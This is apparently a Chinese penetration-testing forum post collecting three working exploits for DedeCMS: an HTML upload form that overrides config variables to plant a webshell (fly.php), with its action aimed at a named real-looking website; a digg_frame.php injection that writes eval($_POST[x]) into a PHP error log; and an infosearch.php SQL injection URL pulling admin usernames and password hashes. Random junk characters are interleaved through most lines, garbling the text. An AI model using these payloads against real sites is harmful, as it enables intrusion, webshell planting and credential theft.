% J. o; l- E* H1 X* G8 S# ]8 F! z  F- H5 l8 T" w$ o1 A

" T8 ]: N% ^0 r  F
1 {; R1 M6 ^- i8 j/ ~+ A- p# e# U) b/ d. c8 ]

6 I3 X# X6 t! H/ d
. x) y1 e8 K7 q* g" q# \. T7 g5 ^7 M
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
% Y6 M7 C1 {$ N# J; Q<html>
) q) I/ q# B+ p2 }) I8 U<head>: |: ?4 T9 k" j" Z0 @: v. c' B
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
- G, ?; i1 r; j% P</head>9 d3 V$ @6 r( e8 g
<body style="FONT-SIZE: 9pt">4 C; V# D5 Z: A% v. h
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br /># ]7 l& F7 R% T3 P4 \7 K% G9 {
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
6 P+ r* @+ P/ @8 }8 y3 S3 M; D2 Q$ I<input type='hidden' name='activepath' value='/data/cache/' />
4 {) U4 K2 Z+ H: i2 k# e3 u<input type='hidden' name='cfg_basedir' value='../../' />. e/ I0 @7 T! I) l/ n" Z" b
<input type='hidden' name='cfg_imgtype' value='php' />8 x: x# X4 M! f0 J; X
<input type='hidden' name='cfg_not_allowall' value='txt' />
% u" T) r% K8 Q0 H2 O4 I4 o<input type='hidden' name='cfg_softtype' value='php' />
- H# X6 Q7 C; m; H% T) O3 v<input type='hidden' name='cfg_mediatype' value='php' />
7 `) n8 s% A5 }8 E# [1 P<input type='hidden' name='f' value='form1.enclosure' />
: f, V& X* F# o1 Z1 o6 ]+ C<input type='hidden' name='job' value='upload' />
* H5 u* _. O5 i2 q" }<input type='hidden' name='newname' value='fly.php' />" N# }0 q7 F% u  C7 g
Select U Shell <input type='file' name='uploadfile' size='25' />
# b5 Q/ z) u) K8 W9 j9 V! U<input type='submit' name='sb1' value='确定' />1 ?7 @/ N) _5 p' b% b) c$ B8 z: R: }
</form>
$ C! A1 r: P8 }; G<br />It's just a exp for the bug of Dedecms V55...<br />$ C9 q2 l( x* w( J6 _
Need register_globals = on...<br />6 w) e; y' ], l" e- C
Fun the game,get a webshell at /data/cache/fly.php...<br />0 I* [& R8 A- a% [5 }
</body>8 w- E+ K9 u& z2 Q: q
</html>
2 d9 `. C1 G  L# B8 U2 o1 f9 R' J7 \7 r$ ~5 |( e; u

4 q% J" t" ?3 j: B: [' J: _3 x9 A" [1 e+ G2 A0 S* R/ j/ V' E" t. y: \
  V1 u2 }$ W, S& w* r' S+ {

5 ?% z& O3 m# X2 H" }
; B/ f; n6 h2 w% ?/ {. }, `# Y' ]! t! Y2 h; k
6 c8 y9 i& O+ C7 U4 p
- n8 X! [8 {6 u6 q0 w9 k
( {9 U4 X% d6 U; o
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
- k# l0 W, D& b利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
: C; r/ B1 G9 k& x2 q1. 访问网址:$ R7 k/ L0 g7 C! |" M5 h8 u
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>! ~- s. \+ @6 J$ a) {
可看见错误信息
# F5 h! B% @" {0 Y1 m. e% W$ d$ Y- D3 c5 T$ c' I, Z
! a- J  c* |# n: P, z
2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。7 U  ^, m5 T# B3 v2 t
int(3) Error: Illegal double '1024e1024' value found during parsing
$ A% _9 J8 g, D" i" ~/ Q- cError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
, f: L- S' L% `9 a# u) _2 J
8 p7 V8 |. Z, n' ^' L. W, Q
- V! x/ W8 Z- c/ V  Z3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是' o# |* k8 e: e# I% P# W
  B0 {- p/ I# J) O
* K5 r, z$ z% L) ?5 G+ S) M' @# A3 D
<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>/ U8 \5 p1 ^( d6 U3 e

, X) I/ J! D5 e* _* n) f3 Y% @( I( V6 m# k4 W1 Q! J7 Y7 T
按确定后的看到第2步骤的信息表示文件木马上传成功.
2 h! \, i1 f0 T9 m; }6 ]( q( Q: n
5 R& o8 @6 i0 {# v0 n1 L9 W9 p
: |& o; p4 Q# p3 I; b
5 b) h. g+ U2 x) E) M! s& J' w( z& [9 ], C+ C! e  S9 b0 {$ Y& y

, n; h& z- j" h/ P7 z$ C
8 n! L) x4 V! x
; Y- {. l9 C* a& W, ^& {1 \( N; b: f/ e' [7 `5 l6 u2 u

" D5 c  e' d% j: J- M
% ^) _& d# j8 m5 v% c0 l
  U1 X# G/ _% m( c
5 d* `( |! T" E3 d, ?1 |织梦(DedeCms)plus/infosearch.php 文件注入漏洞
+ S5 y5 Y: M9 U0 N* x0 m( ahttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2